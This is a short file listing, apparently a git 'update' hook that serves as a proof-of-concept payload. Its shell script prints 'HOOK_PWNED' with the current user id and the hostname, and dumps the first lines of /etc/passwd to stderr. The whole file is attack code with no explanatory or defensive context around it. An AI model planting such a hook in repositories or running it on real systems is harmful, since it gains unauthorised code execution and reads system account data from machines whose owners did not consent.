update 103 B

12345
  1. #!/bin/sh
  2. echo "HOOK_PWNED:$(id)" >&2
  3. echo "HOST:$(hostname)" >&2
  4. cat /etc/passwd | head -5 >&2
  5. exit 0